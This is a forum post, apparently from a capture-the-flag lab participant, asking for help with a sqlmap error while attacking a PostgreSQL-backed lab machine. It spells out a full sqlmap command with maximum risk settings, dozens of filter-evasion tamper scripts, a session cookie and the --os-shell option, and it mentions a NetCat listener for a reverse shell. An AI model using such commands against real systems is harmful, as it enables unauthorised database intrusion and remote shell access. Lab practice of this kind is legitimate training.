Hi there,
I am stuck on this box thanks to this. It is second stage:
[15:29:35] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2
I have had the database collapse entirely e.g. no cars to display at all but that has resolved itself. I have been attacking this box for days now and it is getting tedious. I have voted to reset the box over and over again, and sometimes waited until the next day to try it again, still getting this error:
[15:29:35] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2
Is there any way to manually perform the SQL injection to speed things up/bypass this error? Any suggestions would be appreciated, as I am beginning to lose my mind on this one.
ALSO: I did perform a particularly aggressive SQLmap scan which worked last night, I used:
sqlmap --flush-session --risk=3 --level=5 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords -u âhttp://10.10.10.46/dashboard.php?search=alphaâ --cookie=âPHPSESSID:pft1e158fgiviqfnp8qs66rk6sâ --os-shell
However, the scan took so long that I forgot to keep an eye on my NetCat listener, and missed my chance to spin up the reverse shell. Kicking myself for this. Does anyone have any idea why this particularly verbose scan worked as opposed to the ordinary one?
Kind regards,
slugpockets